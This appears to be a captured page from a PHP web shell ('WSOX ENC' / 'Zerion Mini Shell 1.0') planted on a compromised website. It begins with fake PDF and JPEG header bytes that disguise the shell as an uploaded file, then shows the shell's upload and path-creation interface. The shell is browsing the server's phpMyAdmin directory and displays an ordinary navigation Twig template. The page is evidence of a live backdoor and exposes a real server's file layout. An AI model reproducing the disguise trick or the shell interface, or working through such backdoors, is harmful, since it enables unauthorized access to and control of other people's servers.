%PDF- %PDF- ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC
Mini Shell

Mini Shell

Direktori : /var/www/html/pma/templates/navigation/
Upload File :
Create Path :
Current File : /var/www/html/pma/templates/navigation/main.twig

{% if not is_ajax %}
  <div id="pma_navigation" class="d-print-none" data-config-navigation-width="{{ config_navigation_width }}">
    <div id="pma_navigation_resizer"></div>
    <div id="pma_navigation_collapser"></div>
    <div id="pma_navigation_content">
      <div id="pma_navigation_header">

        {% if logo.is_displayed %}
          <div id="pmalogo">
            {% if logo.has_link %}
              <a href="{{ logo.link|default('#') }}"{{ logo.attributes|raw }}>
            {% endif %}
            {% if logo.source is not empty %}
              <img id="imgpmalogo" src="{{ logo.source }}" alt="phpMyAdmin">
            {% else %}
              <h1>phpMyAdmin</h1>
            {% endif %}
            {% if logo.has_link %}
              </a>
            {% endif %}
          </div>
        {% endif %}

        <div id="navipanellinks">
          <a href="{{ url('/') }}" title="{% trans 'Home' %}">
            {{- get_image('b_home', 'Home'|trans) -}}
          </a>

          {% if server != 0 %}
            <a class="logout disableAjax" href="{{ url('/logout') }}" title="{{ auth_type == 'config' ? 'Empty session data'|trans : 'Log out'|trans }}">
              {{- get_image('s_loggoff', auth_type == 'config' ? 'Empty session data'|trans : 'Log out'|trans) -}}
            </a>
          {% endif %}

          <a href="{{ get_docu_link('index') }}" title="{% trans 'phpMyAdmin documentation' %}" target="_blank" rel="noopener noreferrer">
            {{- get_image('b_docs', 'phpMyAdmin documentation'|trans) -}}
          </a>

          <a href="{{ get_docu_url(is_mariadb) }}" title="{{ is_mariadb ? 'MariaDB Documentation'|trans : 'MySQL Documentation'|trans }}" target="_blank" rel="noopener noreferrer">
            {{- get_image('b_sqlhelp', is_mariadb ? 'MariaDB Documentation'|trans : 'MySQL Documentation'|trans) -}}
          </a>

          <a id="pma_navigation_settings_icon"{{ not is_navigation_settings_enabled ? ' class="hide"' }} href="#" title="{% trans 'Navigation panel settings' %}">
            {{- get_image('s_cog', 'Navigation panel settings'|trans) -}}
          </a>

          <a id="pma_navigation_reload" href="#" title="{% trans 'Reload navigation panel' %}">
            {{- get_image('s_reload', 'Reload navigation panel'|trans) -}}
          </a>
        </div>

        {% if is_servers_displayed and servers|length > 1 %}
          <div id="serverChoice">
            {{ server_select|raw }}
          </div>
        {% endif %}

        {{ get_image('ajax_clock_small', 'Loading…'|trans, {
          'style': 'visibility: hidden; display:none',
          'class': 'throbber'
        }) }}
      </div>
      <div id="pma_navigation_tree" class="list_container{{ is_synced ? ' synced' }}{{ is_highlighted ? ' highlight' }}{{ is_autoexpanded ? ' autoexpand' }}">
{% endif %}

{% if not navigation_tree %}
  {{ 'An error has occurred while loading the navigation display'|trans|error }}
{% else %}
  {{ navigation_tree|raw }}
{% endif %}

{% if not is_ajax %}
      </div>

      <div id="pma_navi_settings_container">
        {% if is_navigation_settings_enabled %}
          {{ navigation_settings|raw }}
        {% endif %}
      </div>
    </div>

    {% if is_drag_drop_import_enabled %}
      <div class="pma_drop_handler">
        {% trans 'Drop files here' %}
      </div>
      <div class="pma_sql_import_status">
        <h2>
          {% trans 'SQL upload' %}
          ( <span class="pma_import_count">0</span> )
          <span class="close">x</span>
          <span class="minimize">-</span>
        </h2>
        <div></div>
      </div>
    {% endif %}
  </div>
  {{ include('modals/unhide_nav_item.twig') }}
{% endif %}

Zerion Mini Shell 1.0